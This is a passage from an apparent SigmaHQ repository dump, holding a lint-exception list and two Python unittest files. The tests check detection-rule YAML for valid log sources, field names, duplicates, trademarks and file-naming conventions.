f6de6525-4509-495a-8a82-1f8b0ed73a00: escaped_wildcard\n    fb502828-2db0-438e-93e6-801c7548686d: escaped_wildcard\n    64e8e417-c19a-475a-8d19-98ea705394cc: escaped_wildcard\n    # number_as_string\n    5c84856b-55a5-45f1-826f-13f37250cf4e: number_as_string\n    749c9f5e-b353-4b90-a9c1-05243357ca4b: number_as_string\n    85b88e05-dadc-430b-8a9e-53ff1cd30aae: number_as_string\n    9a025188-6f2d-42f8-bb2f-d3a83d24a5af: number_as_string\n    # specific_instead_of_generic_logsource\n    23b71bc5-953e-4971-be4c-c896cda73fc2: specific_instead_of_generic_logsource\n    693a44e9-7f26-4cb6-b787-214867672d3a: specific_instead_of_generic_logsource\n    8ac03a65-6c84-4116-acad-dc1558ff7a77: specific_instead_of_generic_logsource\n    c3e5c1b1-45e9-4632-b242-27939c170239: specific_instead_of_generic_logsource\n    # SigmahqCategoryWindowsProviderNameIssue\n    3f3f3506-1895-401b-9cc3-e86b16e630d0: sigmahq_category_windows_provider_name\n    7dc2dedd-7603-461a-bc13-15803d132355: sigmahq_category_windows_provider_name\n    # SigmahqInvalidHashKvIssue\n    b69888d4-380c-45ce-9cf9-d9ce46e67821: sigmahq_invalid_hash_kv\n    # SigmahqRedundantFieldIssue\n    0f06a3a5-6a09-413f-8743-e6cf35561297: sigmahq_redundant_field\n    f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7: sigmahq_redundant_field\n    # InvalidATTACKTagIssue remove after pySigma 1.0.0 release\n    afd12fed-b0ec-45c9-a13d-aa86625dac81: attacktag\n"
  },
  {
    "path": "tests/test_logsource.py",
    "content": "#!/usr/bin/env python3\n\"\"\"\nChecks for logsource or fieldname errors on all rules\n\nRun using the command\n# python test_logsource.py\n\"\"\"\n\nimport os\nimport unittest\nimport yaml\nfrom colorama import init\nfrom colorama import Fore\nimport json\n\n\nclass TestRules(unittest.TestCase):\n    path_to_rules_ = [\n        \"rules\",\n        \"rules-emerging-threats\",\n        \"rules-placeholder\",\n        \"rules-threat-hunting\",\n        \"rules-compliance\",\n    ]\n    path_to_rules = []\n    for path_ in path_to_rules_:\n        path_to_rules.append(\n            os.path.join(os.path.dirname(os.path.realpath(__name__)), path_)\n        )\n\n    # Helper functions\n    def yield_next_rule_file_path(self, path_to_rules: list) -> str:\n        for path_ in path_to_rules:\n            for root, _, files in os.walk(path_):\n                for file in files:\n                    if file.endswith(\".yml\"):\n                        yield os.path.join(root, file)\n\n    def get_rule_yaml(self, file_path: str) -> dict:\n        data = []\n\n        with open(file_path, encoding=\"utf-8\") as f:\n            yaml_parts = yaml.safe_load_all(f)\n            for part in yaml_parts:\n                data.append(part)\n\n        return data\n\n    def get_rule_part(self, file_path: str, part_name: str):\n        yaml_dicts = self.get_rule_yaml(file_path)\n        for yaml_part in yaml_dicts:\n            if part_name in yaml_part.keys():\n                return yaml_part[part_name]\n\n        return None\n\n    def get_detection_field(self, detection: dict):\n        data = []\n\n        def get_field_name(selection: dict):\n            name = []\n            for field in selection:\n                if field == \"|all\":\n                    continue\n                elif \"|\" in field:\n                    name.append(field.split(\"|\")[0])\n                else:\n                    name.append(field)\n            return name\n\n        for search_identifier in detection:\n            if isinstance(detection[search_identifier], dict):\n                data += get_field_name(detection[search_identifier])\n            if isinstance(detection[search_identifier], list):\n                for list_value in detection[search_identifier]:\n                    if isinstance(list_value, dict):\n                        data += get_field_name(list_value)\n\n        return data\n\n    def full_logsource(self, logsource: dict) -> dict:\n        data = {}\n\n        data[\"product\"] = (\n            logsource[\"product\"] if \"product\" in logsource.keys() else None\n        )\n        data[\"category\"] = (\n            logsource[\"category\"] if \"category\" in logsource.keys() else None\n        )\n        data[\"service\"] = (\n            logsource[\"service\"] if \"service\" in logsource.keys() else None\n        )\n\n        return data\n\n    def exist_logsource(self, logsource: dict) -> bool:\n        # Check New product\n        if logsource[\"product\"]:\n            if logsource[\"product\"] in fieldname_dict.keys():\n                product = logsource[\"product\"]\n            else:\n                return False\n        else:\n            product = \"empty\"\n\n        if (\n            logsource[\"category\"]\n            and logsource[\"category\"] in fieldname_dict[product][\"category\"].keys()\n        ):\n            return True\n        elif (\n            logsource[\"service\"]\n            and logsource[\"service\"] in fieldname_dict[product][\"service\"].keys()\n        ):\n            return True\n        elif logsource[\"category\"] == None and logsource[\"service\"] == None:\n            return True  # We known the product but there are no category or service\n\n        return False\n\n    def get_logsource(self, logsource: dict) -> list:\n        data = None\n\n        product = (\n            logsource[\"product\"]\n            if logsource[\"product\"] in fieldname_dict.keys()\n            else \"empty\"\n        )\n\n        if (\n            logsource[\"category\"]\n            and logsource[\"category\"] in fieldname_dict[product][\"category\"].keys()\n        ):\n            data = fieldname_dict[product][\"category\"][logsource[\"category\"]]\n        elif (\n            logsource[\"service\"]\n            and logsource[\"service\"] in fieldname_dict[product][\"service\"].keys()\n        ):\n            data = fieldname_dict[product][\"service\"][logsource[\"service\"]]\n        elif logsource[\"category\"] == None and logsource[\"service\"] == None:\n            data = fieldname_dict[product][\"empty\"]\n\n        return data\n\n    def not_commun(self, logsource: dict, data: list) -> bool:\n        product = (\n            logsource[\"product\"]\n            if logsource[\"product\"] in fieldname_dict.keys()\n            else \"empty\"\n        )\n\n        if fieldname_dict[product][\"common\"] == data:\n            return False\n        else:\n            return True\n\n    #\n    # test functions\n    #\n    def test_invalid_logsource_attributes(self):\n        faulty_rules = []\n        valid_logsource = [\n            \"category\",\n            \"product\",\n            \"service\",\n            \"definition\",\n        ]\n\n        for file in self.yield_next_rule_file_path(self.path_to_rules):\n            logsource = self.get_rule_part(file_path=file, part_name=\"logsource\")\n            if not logsource:\n                print(Fore.RED + \"Rule {} has no 'logsource'.\".format(file))\n                faulty_rules.append(file)\n                continue\n            valid = True\n            for key in logsource:\n                if key not in valid_logsource:\n                    print(\n                        Fore.RED\n                        + \"Rule {} has a logsource with an invalid field ({})\".format(\n                            file, key\n                        )\n                    )\n                    valid = False\n                elif not isinstance(logsource[key], str):\n                    print(\n                        Fore.RED\n                        + \"Rule {} has a logsource with an invalid field type ({})\".format(\n                            file, key\n                        )\n                    )\n                    valid = False\n            if not valid:\n                faulty_rules.append(file)\n\n        self.assertEqual(\n            faulty_rules,\n            [],\n            Fore.RED\n            + \"There are rules with non-conform 'logsource' fields. Please check: https://github.com/SigmaHQ/sigma/wiki/Rule-Creation-Guide#log-source\",\n        )\n\n    def test_logsource_value(self):\n        faulty_rules = []\n\n        for file in self.yield_next_rule_file_path(self.path_to_rules):\n            logsource = self.get_rule_part(file_path=file, part_name=\"logsource\")\n            if logsource:\n                full_logsource = self.full_logsource(logsource)\n                if not self.exist_logsource(full_logsource):\n                    faulty_rules.append(file)\n                    print(\n                        Fore.RED\n                        + \"Rule {} has the unknown logsource product/category/service ({}/{}/{})\".format(\n                            file,\n                            full_logsource[\"product\"],\n                            full_logsource[\"category\"],\n                            full_logsource[\"service\"],\n                        )\n                    )\n\n        self.assertEqual(\n            faulty_rules,\n            [],\n            Fore.RED + \"There are rules with non-conform 'logsource' values.\",\n        )\n\n    def test_fieldname_case(self):\n        files_with_fieldname_issues = []\n\n        for file in self.yield_next_rule_file_path(self.path_to_rules):\n            logsource = self.get_rule_part(file_path=file, part_name=\"logsource\")\n            detection = self.get_rule_part(file_path=file, part_name=\"detection\")\n\n            if logsource and detection:\n                full_logsource = self.full_logsource(logsource)\n                list_valid = self.get_logsource(full_logsource)\n                first_time = True\n\n                if list_valid and self.not_commun(full_logsource, list_valid):\n                    for field in self.get_detection_field(detection):\n                        if not field in list_valid:\n                            print(\n                                Fore.RED\n                                + \"Rule {} has the invalid field <{}>\".format(\n                                    file, field\n                                )\n                            )\n                            if first_time:\n                                files_with_fieldname_issues.append(file)\n                                first_time = False  # can be many error in the same rule\n\n        self.assertEqual(\n            files_with_fieldname_issues,\n            [],\n            Fore.RED\n            + \"There are rule files which contains unknown field or with cast error\",\n        )\n\n\ndef load_fields_json(name: str):\n    data = {}\n\n    file_path = os.path.abspath(os.path.dirname(__file__)) + \"/\" + name\n    with open(file_path, \"r\") as file:\n        json_dict = json.load(file)\n\n    for product in json_dict[\"legit\"]:\n        data[product] = json_dict[\"legit\"][product]\n\n    for product in json_dict[\"addon\"]:\n        for category in json_dict[\"addon\"][product][\"category\"]:\n            data[product][\"category\"][category] += json_dict[\"addon\"][product][\n                \"category\"\n            ][category]\n        for service in json_dict[\"addon\"][product][\"service\"]:\n            data[product][\"service\"][service] += json_dict[\"addon\"][product][\"service\"][\n                service\n            ]\n\n    # We use some extracted hash\n    # Add common field\n    for product in data:\n        for category in data[product][\"category\"]:\n            # if \"Hashes\" in data[product][\"category\"][category]:\n            #     data[product][\"category\"][category] += [\n            #         \"md5\",\n            #         \"sha1\",\n            #         \"sha256\",\n            #         \"Imphash\",\n            #     ]\n            # if (\n            #     \"Hash\" in data[product][\"category\"][category]\n            # ):  # Sysmon 15 create_stream_hash\n            #     data[product][\"category\"][category] += [\n            #         \"md5\",\n            #         \"sha1\",\n            #         \"sha256\",\n            #         \"Imphash\",\n            #     ]\n            if \"common\" in data[product].keys():\n                data[product][\"category\"][category] += data[product][\"common\"]\n        for service in data[product][\"service\"]:\n            if \"common\" in data[product].keys():\n                data[product][\"service\"][service] += data[product][\"common\"]\n\n    return data\n\n\nif __name__ == \"__main__\":\n    init(autoreset=True)\n    # load field name information\n    fieldname_dict = load_fields_json(\"logsource.json\")\n\n    # Run the tests\n    unittest.main()\n"
  },
  {
    "path": "tests/test_rules.py",
    "content": "#!/usr/bin/env python3\n\"\"\"\nChecks for noncompliance or common errors on all rules\n\nRun using the command\n# python test_rules.py\n\"\"\"\n\nimport os\nimport unittest\nimport yaml\nimport re\nimport string\n\n# from attackcti import attack_client\nfrom colorama import init\nfrom colorama import Fore\nimport collections\n\n\n# Old Tests cover by pySigma 0.10.9 and simgma-cli 0.7.10\n# Use sigma check --fail-on-error --fail-on-issues --validation-config tests/sigma_cli_conf.yml rules*\n#\n\n\nclass TestRules(unittest.TestCase):\n    # @classmethod\n    # def setUpClass(cls):\n    #     print(\"Calling get_mitre_data()\")\n    #     # Get Current Data from MITRE ATT&CK®\n    #     cls.MITRE_ALL = get_mitre_data()\n    #     print(\"Catched data - starting tests...\")\n\n    # MITRE_TECHNIQUE_NAMES = [\n    #     \"process_injection\",\n    #     \"signed_binary_proxy_execution\",\n    #     \"process_injection\",\n    # ]  # incomplete list\n    # MITRE_TACTICS = [\n    #     \"initial_access\",\n    #     \"execution\",\n    #     \"persistence\",\n    #     \"privilege_escalation\",\n    #     \"defense_evasion\",\n    #     \"credential_access\",\n    #     \"discovery\",\n    #     \"lateral_movement\",\n    #     \"collection\",\n    #     \"exfiltration\",\n    #     \"command_and_control\",\n    #     \"impact\",\n    #     \"launch\",\n    # ]\n    # # Don't use trademarks in rules - they require non-ASCII characters to be used on we don't want them in our rules\n    TRADE_MARKS = {\"MITRE ATT&CK\", \"ATT&CK\"}\n\n    path_to_rules = [\n        \"rules\",\n        \"rules-emerging-threats\",\n        \"rules-placeholder\",\n        \"rules-threat-hunting\",\n        \"rules-compliance\",\n    ]\n\n    # Helper functions\n    def yield_next_rule_file_path(self, path_to_rules: list) -> str:\n        for path_ in path_to_rules:\n            for root, _, files in os.walk(path_):\n                for file in files:\n                    if file.endswith(\".yml\"):\n                        yield os.path.join(root, file)\n\n    def get_rule_part(self, file_path: str, part_name: str):\n        yaml_dicts = self.get_rule_yaml(file_path)\n        for yaml_part in yaml_dicts:\n            if part_name in yaml_part.keys():\n                return yaml_part[part_name]\n\n        return None\n\n    def get_rule_yaml(self, file_path: str) -> dict:\n        data = []\n\n        with open(file_path, encoding=\"utf-8\") as f:\n            yaml_parts = yaml.safe_load_all(f)\n            for part in yaml_parts:\n                data.append(part)\n\n        return data\n\n    # Tests\n    def test_legal_trademark_violations(self):\n        # See Issue # https://github.com/SigmaHQ/sigma/issues/1028\n        files_with_legal_issues = []\n\n        for file in self.yield_next_rule_file_path(self.path_to_rules):\n            with open(file, \"r\", encoding=\"utf-8\") as fh:\n                file_data = fh.read()\n                for tm in self.TRADE_MARKS:\n                    if tm in file_data:\n                        files_with_legal_issues.append(file)\n\n        self.assertEqual(\n            files_with_legal_issues,\n            [],\n            Fore.RED\n            + \"There are rule files which contains a trademark or reference that doesn't comply with the respective trademark requirements - please remove the trademark to avoid legal issues\",\n        )\n\n    # sigma cli SigmahqFieldDuplicateValueIssue\n    # def test_look_for_duplicate_filters(self):\n    #     def check_list_or_recurse_on_dict(item, depth: int, special: bool) -> None:\n    #         if type(item) == list:\n    #             check_if_list_contain_duplicates(item, depth, special)\n    #         elif type(item) == dict and depth <= MAX_DEPTH:\n    #             for keys, sub_item in item.items():\n    #                 if (\n    #                     \"|base64\" in keys or \"|re\" in keys\n    #                 ):  # Covers both \"base64\" and \"base64offset\" modifiers, and \"re\" modifier\n    #                     check_list_or_recurse_on_dict(sub_item, depth + 1, True)\n    #                 else:\n    #                     check_list_or_recurse_on_dict(sub_item, depth + 1, special)\n\n    #     def check_if_list_contain_duplicates(\n    #         item: list, depth: int, special: bool\n    #     ) -> None:\n    #         try:\n    #             # We use a list comprehension to convert all the element to lowercase. Since we don't care about casing in SIGMA except for the following modifiers\n    #             #   - \"base64offset\"\n    #             #   - \"base64\"\n    #             #   - \"re\"\n    #             if special:\n    #                 item_ = item\n    #             else:\n    #                 item_ = [i.lower() for i in item]\n    #             if len(item_) != len(set(item_)):\n    #                 # We find the duplicates and then print them to the user\n    #                 duplicates = [\n    #                     i\n    #                     for i, count in collections.Counter(item_).items()\n    #                     if count > 1\n    #                 ]\n    #                 print(\n    #                     Fore.RED\n    #                     + \"Rule {} has duplicate filters {}\".format(file, duplicates)\n    #                 )\n    #                 files_with_duplicate_filters.append(file)\n    #         except:\n    #             # unhashable types like dictionaries\n    #             for sub_item in item:\n    #                 if type(sub_item) == dict and depth <= MAX_DEPTH:\n    #                     check_list_or_recurse_on_dict(sub_item, depth + 1, special)\n\n    #     MAX_DEPTH = 3\n    #     files_with_duplicate_filters = []\n\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         detection = self.get_rule_part(file_path=file, part_name=\"detection\")\n    #         check_list_or_recurse_on_dict(detection, 1, False)\n\n    #     self.assertEqual(\n    #         files_with_duplicate_filters,\n    #         [],\n    #         Fore.RED + \"There are rules with duplicate filters\",\n    #     )\n\n    #sigma cli SigmahqFieldWithSpaceIssue\n    # def test_field_name_with_space(self):\n    #     def key_iterator(fields, faulty):\n    #         for key, value in fields.items():\n    #             if \" \" in key:\n    #                 faulty.append(key)\n    #                 print(\n    #                     Fore.YELLOW\n    #                     + \"Rule {} has a space in field name ({}).\".format(file, key)\n    #                 )\n    #             if type(value) == dict:\n    #                 key_iterator(value, faulty)\n\n    #     faulty_fieldnames = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         detection = self.get_rule_part(file_path=file, part_name=\"detection\")\n    #         key_iterator(detection, faulty_fieldnames)\n\n    #     self.assertEqual(\n    #         faulty_fieldnames,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with an unsupported field name. Spaces are not allowed. (Replace space with an underscore character '_' )\",\n    #     )\n\n    #sigma cli AllOfThemConditionIssue\n    # def test_single_named_condition_with_x_of_them(self):\n    #     faulty_detections = []\n\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         yaml = self.get_rule_yaml(file_path=file)\n    #         detection = self.get_rule_part(file_path=file, part_name=\"detection\")\n\n    #         has_them_in_condition = \"them\" in detection[\"condition\"]\n    #         has_only_one_named_condition = len(detection) == 2\n    #         not_multipart_yaml_file = len(yaml) == 1\n\n    #         if (\n    #             has_them_in_condition\n    #             and has_only_one_named_condition\n    #             and not_multipart_yaml_file\n    #         ):\n    #             faulty_detections.append(file)\n\n    #     self.assertEqual(\n    #         faulty_detections,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules using '1/all of them' style conditions but only have one condition\",\n    #     )\n\n    def test_duplicate_detections(self):\n        def compare_detections(detection1: dict, detection2: dict) -> bool:\n            # If they have different log sources. They can't be the same\n            # We first remove any definitions fields (if there are any) in the logsource to avoid typos\n            detection1[\"logsource\"].pop(\"definition\", None)\n            detection2[\"logsource\"].pop(\"definition\", None)\n\n            if detection1[\"logsource\"] != detection2[\"logsource\"]:\n                return False\n\n            # detections not the same count can't be the same\n            if len(detection1) != len(detection2):\n                return False\n\n            for named_condition in detection1:\n                # don't check timeframes\n                if named_condition == \"timeframe\":\n                    continue\n\n                # condition clause must be the same too\n                if named_condition == \"condition\":\n                    if detection1[\"condition\"] != detection2[\"condition\"]:\n                        return False\n                    else:\n                        continue\n\n                # Named condition must exist in both rule files\n                if named_condition not in detection2:\n                    return False\n\n                # can not be the same  if len is not equal\n                if len(detection1[named_condition]) != len(detection2[named_condition]):\n                    return False\n\n                for condition in detection1[named_condition]:\n                    if type(condition) != str:\n                        return False\n\n                    if condition not in detection2[named_condition]:\n                        return False\n\n                    # We add this check in case of keyword rules. Where no field is used. The parser returns a list instead of a dict\n                    # If the 2 list are different that means they aren't the same\n                    if (type(detection1[named_condition]) == list) or (\n                        type(detection2[named_condition]) == list\n                    ):\n                        condition_value1 = detection1[named_condition]\n                        condition_value2 = detection2[named_condition]\n                    else:\n                        condition_value1 = detection1[named_condition][condition]\n                        condition_value2 = detection2[named_condition][condition]\n\n                    if condition_value1 != condition_value2:\n                        return False\n\n            return True\n\n        faulty_detections = []\n        files_and_their_detections = {}\n\n        for file in self.yield_next_rule_file_path(self.path_to_rules):\n            detection = self.get_rule_part(file_path=file, part_name=\"detection\")\n            logsource = self.get_rule_part(file_path=file, part_name=\"logsource\")\n            detection[\"logsource\"] = {}\n            detection[\"logsource\"].update(logsource)\n            yaml = self.get_rule_yaml(file_path=file)\n\n            is_multipart_yaml_file = len(yaml) != 1\n            if is_multipart_yaml_file:\n                continue\n\n            for key in files_and_their_detections:\n                if compare_detections(detection, files_and_their_detections[key]):\n                    faulty_detections.append((key, file))\n\n            files_and_their_detections[file] = detection\n\n        self.assertEqual(\n            faulty_detections,\n            [],\n            Fore.YELLOW + \"There are rule files with exactly the same detection logic.\",\n        )\n\n    def test_source_eventlog(self):\n        faulty_detections = []\n\n        for file in self.yield_next_rule_file_path(self.path_to_rules):\n            detection = self.get_rule_part(file_path=file, part_name=\"detection\")\n            detection_str = str(detection).lower()\n            if \"'source': 'eventlog'\" in detection_str:\n                faulty_detections.append(file)\n\n        self.assertEqual(\n            faulty_detections,\n            [],\n            Fore.YELLOW\n            + \"There are detections with 'Source: Eventlog'. This does not add value to the detection.\",\n        )\n\n    def test_event_id_instead_of_process_creation(self):\n        faulty_detections = []\n        for file in self.yield_next_rule_file_path(self.path_to_rules):\n            with open(file, encoding=\"utf-8\") as f:\n                for line in f:\n                    if (\n                        re.search(r\".*EventID: (?:1|4688)\\s*$\", line)\n                        and file not in faulty_detections\n                    ):\n                        detection = self.get_rule_part(\n                            file_path=file, part_name=\"detection\"\n                        )\n                        if detection:\n                            for search_identifier in detection:\n                                if isinstance(detection[search_identifier], dict):\n                                    for field in detection[search_identifier]:\n                                        if \"Provider_Name\" in field:\n                                            if isinstance(\n                                                detection[search_identifier][\n                                                    \"Provider_Name\"\n                                                ],\n                                                list,\n                                            ):\n                                                for value in detection[\n                                                    search_identifier\n                                                ][\"Provider_Name\"]:\n                                                    if (\n                                                        \"Microsoft-Windows-Security-Auditing\"\n                                                        in value\n                                                        or \"Microsoft-Windows-Sysmon\"\n                                                        in value\n                                                    ):\n                                                        if (\n                                                            file\n                                                            not in faulty_detections\n                                                        ):\n                                                            faulty_detections.append(\n                                                                file\n                                                            )\n                                            else:\n                                                if (\n                                                    \"Microsoft-Windows-Security-Auditing\"\n                                                    in detection[search_identifier][\n                                                        \"Provider_Name\"\n                                                    ]\n                                                    or \"Microsoft-Windows-Sysmon\"\n                                                    in detection[search_identifier][\n                                                        \"Provider_Name\"\n                                                    ]\n                                                ):\n                                                    if file not in faulty_detections:\n                                                        faulty_detections.append(file)\n\n        self.assertEqual(\n            faulty_detections,\n            [],\n            Fore.YELLOW\n            + \"There are rules still using Sysmon 1 or Event ID 4688. Please migrate to the process_creation category.\",\n        )\n\n    def test_sysmon_rule_without_eventid(self):\n        faulty_rules = []\n        for file in self.yield_next_rule_file_path(self.path_to_rules):\n            logsource = self.get_rule_part(file_path=file, part_name=\"logsource\")\n            if logsource:\n                service = logsource.get(\"service\", \"\")\n                if service.lower() == \"sysmon\":\n                    with open(file, encoding=\"utf-8\") as f:\n                        found = False\n                        for line in f:\n                            # might be on a single line or in multiple lines\n                            if re.search(r\".*EventID:.*$\", line):\n                                found = True\n                                break\n                        if not found:\n                            faulty_rules.append(file)\n\n        self.assertEqual(\n            faulty_rules,\n            [],\n            Fore.RED\n            + \"There are rules using sysmon events but with no EventID specified\",\n        )\n\n    # sigma cli SigmahqFalsepositivesCapitalIssue\n    # def test_optional_falsepositives_capital(self):\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         fps = self.get_rule_part(file_path=file, part_name=\"falsepositives\")\n    #         if fps:\n    #             for fp in fps:\n    #                 # first letter should be capital\n    #                 try:\n    #                     if fp[0].upper() != fp[0]:\n    #                         print(\n    #                             Fore.YELLOW\n    #                             + \"Rule {} defines a falsepositive that does not start with a capital letter: '{}'.\".format(\n    #                                 file, fp\n    #                             )\n    #                         )\n    #                         faulty_rules.append(file)\n    #                 except TypeError as err:\n    #                     print(\"TypeError Exception for rule {}\".format(file))\n    #                     print(\"Error: {}\".format(err))\n    #                     print(\"Maybe you created an empty falsepositive item?\")\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with false positives that don't start with a capital letter (e.g. 'unknown' should be 'Unknown')\",\n    #     )\n\n    # sigma cli SigmahqFalsepositivesBannedWordIssue\n    # def test_optional_falsepositives_blocked_content(self):\n    #     faulty_rules = []\n    #     banned_words = [\"none\", \"pentest\", \"penetration test\"]\n    #     common_typos = [\"unkown\", \"ligitimate\", \"legitim \", \"legitimeate\"]\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         fps = self.get_rule_part(file_path=file, part_name=\"falsepositives\")\n    #         if fps:\n    #             for fp in fps:\n    #                 for typo in common_typos:\n    #                     if fp == \"Unknow\" or typo in fp.lower():\n    #                         print(\n    #                             Fore.YELLOW\n    #                             + \"Rule {} defines a falsepositive with a common typo: '{}'.\".format(\n    #                                 file, typo\n    #                             )\n    #                         )\n    #                         faulty_rules.append(file)\n    #                 for banned_word in banned_words:\n    #                     if banned_word in fp.lower():\n    #                         print(\n    #                             Fore.YELLOW\n    #                             + \"Rule {} defines a falsepositive with an invalid reason: '{}'.\".format(\n    #                                 file, banned_word\n    #                             )\n    #                         )\n    #                         faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with invalid false positive definitions (e.g. Pentest, None or common typos)\",\n    #     )\n\n    def test_optional_license(self):\n        faulty_rules = []\n        for file in self.yield_next_rule_file_path(self.path_to_rules):\n            license_str = self.get_rule_part(file_path=file, part_name=\"license\")\n            if license_str:\n                if not isinstance(license_str, str):\n                    print(\n                        Fore.YELLOW\n                        + \"Rule {} has a malformed 'license' (has to be a string).\".format(\n                            file\n                        )\n                    )\n                    faulty_rules.append(file)\n\n        self.assertEqual(\n            faulty_rules,\n            [],\n            Fore.RED\n            + \"There are rules with malformed 'license' fields. (has to be a string )\",\n        )\n\n    # sigma cli SigmaReferencesError\n    # def test_references(self):\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         references = self.get_rule_part(file_path=file, part_name=\"references\")\n    #         # Reference field doesn't exist\n    #         # if not references:\n    #         # print(Fore.YELLOW + \"Rule {} has no field 'references'.\".format(file))\n    #         # faulty_rules.append(file)\n    #         if references:\n    #             # it exists but isn't a list\n    #             if not isinstance(references, list):\n    #                 print(\n    #                     Fore.YELLOW\n    #                     + \"Rule {} has a references field that isn't a list.\".format(\n    #                         file\n    #                     )\n    #                 )\n    #                 faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with malformed 'references' fields. (has to be a list of values even if it contains only a single value)\",\n    #     )\n\n    # sigme cli SigmahqLinkDescriptionIssue\n    # def test_references_in_description(self):\n    #     # This test checks for the presence of a links and special keywords in the \"description\" field while there is no \"references\" field.\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         references = self.get_rule_part(file_path=file, part_name=\"references\")\n    #         # Reference field doesn't exist\n    #         if not references:\n    #             descriptionfield = self.get_rule_part(\n    #                 file_path=file, part_name=\"description\"\n    #             )\n    #             if descriptionfield:\n    #                 for i in [\n    #                     \"http://\",\n    #                     \"https://\",\n    #                     \"internal research\",\n    #                 ]:  # Extends the list with other common references starters\n    #                     if i in descriptionfield.lower():\n    #                         print(\n    #                             Fore.RED\n    #                             + \"Rule {} has a field that contains references to external links but no references set. Add a 'references' key and add URLs as list items.\".format(\n    #                                 file\n    #                             )\n    #                         )\n    #                         faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with malformed 'description' fields. (links and external references have to be in a seperate field named 'references'. see specification https://github.com/SigmaHQ/sigma-specification)\",\n    #     )\n\n    def test_file_names(self):\n        faulty_rules = []\n        name_lst = []\n        filename_pattern = re.compile(r\"[a-z0-9_]{10,90}\\.yml\")\n        for file in self.yield_next_rule_file_path(self.path_to_rules):\n            filename = os.path.basename(file)\n            if filename in name_lst:\n                print(Fore.YELLOW + \"Rule {} is a duplicate file name.\".format(file))\n                faulty_rules.append(file)\n            elif filename[-4:] != \".yml\":\n                print(\n                    Fore.YELLOW + \"Rule {} has a invalid extension (.yml).\".format(file)\n                )\n                faulty_rules.append(file)\n            elif len(filename) > 90:\n                print(\n                    Fore.YELLOW + \"Rule {} has a file name too long >90.\".format(file)\n                )\n                faulty_rules.append(file)\n            elif len(filename) < 14:\n                print(\n                    Fore.YELLOW + \"Rule {} has a file name too short <14.\".format(file)\n                )\n                faulty_rules.append(file)\n            elif filename_pattern.match(filename) == None or not \"_\" in filename:\n                print(\n                    Fore.YELLOW\n                    + \"Rule {} has a file name that doesn't match our standard.\".format(\n                        file\n                    )\n                )\n                faulty_rules.append(file)\n            else:\n                # This test make sure that every rules has a filename that corresponds to\n                # It's specific logsource.\n                # Fix Issue #1381 (https://github.com/SigmaHQ/sigma/issues/1381)\n                logsource = self.get_rule_part(file_path=file, part_name=\"logsource\")\n                if logsource:\n                    pattern_prefix = \"\"\n                    os_infix = \"\"\n                    os_bool = False\n                    for key, value in logsource.items():\n                        if key == \"definition\":\n                            pass\n                        else:\n                            if key == \"product\":\n                                # This is to get the OS for certain categories\n                                if value == \"windows\":\n                                    os_infix = \"win_\"\n                                elif value == \"macos\":\n                                    os_infix = \"macos_\"\n                                elif value == \"linux\":\n                                    os_infix = \"lnx_\"\n                                # For other stuff\n                                elif value == \"aws\":\n                                    pattern_prefix = \"aws_\"\n                                elif value == \"azure\":\n                                    pattern_prefix = \"azure_\"\n                                elif value == \"gcp\":\n                                    pattern_prefix = \"gcp_\"\n                                elif value == \"m365\":\n                                    pattern_prefix = \"microsoft365_\"\n                                elif value == \"okta\":\n                                    pattern_prefix = \"okta_\"\n                                elif value == \"onelogin\":\n                                    pattern_prefix = \"onelogin_\"\n                                elif value == \"github\":\n                                    pattern_prefix = \"github_\"\n                                elif value == \"fortinet\":\n                                    pattern_prefix = \"fortinet_\"\n                            elif key == \"category\":\n                                if value == \"process_creation\":\n                                    pattern_prefix = \"proc_creation_\"\n                                    os_bool = True\n                                elif value == \"image_load\":\n                                    pattern_prefix = \"image_load_\"\n                                elif value == \"file_event\":\n                                    pattern_prefix = \"file_event_\"\n                                    os_bool = True\n                                elif value == \"registry_set\":\n                                    pattern_prefix = \"registry_set_\"\n                                elif value == \"registry_add\":\n                                    pattern_prefix = \"registry_add_\"\n                                elif value == \"registry_event\":\n                                    pattern_prefix = \"registry_event_\"\n                                elif value == \"registry_delete\":\n                                    pattern_prefix = \"registry_delete_\"\n                                elif value == \"registry_rename\":\n                                    pattern_prefix = \"registry_rename_\"\n                                elif value == \"process_access\":\n                                    pattern_prefix = \"proc_access_\"\n                                    os_bool = True\n                                elif value == \"driver_load\":\n                                    pattern_prefix = \"driver_load_\"\n                                    os_bool = True\n                                elif value == \"dns_query\":\n                                    pattern_prefix = \"dns_query_\"\n                                    os_bool = True\n                                elif value == \"ps_script\":\n                                    pattern_prefix = \"posh_ps_\"\n                                elif value == \"ps_module\":\n                                    pattern_prefix = \"posh_pm_\"\n                                elif value == \"ps_classic_start\":\n                                    pattern_prefix = \"posh_pc_\"\n                                elif value == \"pipe_created\":\n                                    pattern_prefix = \"pipe_created_\"\n                                elif value == \"network_connection\":\n                                    pattern_prefix = \"net_connection_\"\n                                    os_bool = True\n                                elif value == \"file_rename\":\n                                    pattern_prefix = \"file_rename_\"\n                                    os_bool = True\n                                elif value == \"file_delete\":\n                                    pattern_prefix = \"file_delete_\"\n                                    os_bool = True\n                                elif value == \"file_change\":\n                                    pattern_prefix = \"file_change_\"\n                                    os_bool = True\n                                elif value == \"file_access\":\n                                    pattern_prefix = \"file_access_\"\n                                    os_bool = True\n                                elif value == \"create_stream_hash\":\n                                    pattern_prefix = \"create_stream_hash_\"\n                                elif value == \"create_remote_thread\":\n                                    pattern_prefix = \"create_remote_thread_win_\"\n                                elif value == \"dns\":\n                                    pattern_prefix = \"net_dns_\"\n                                elif value == 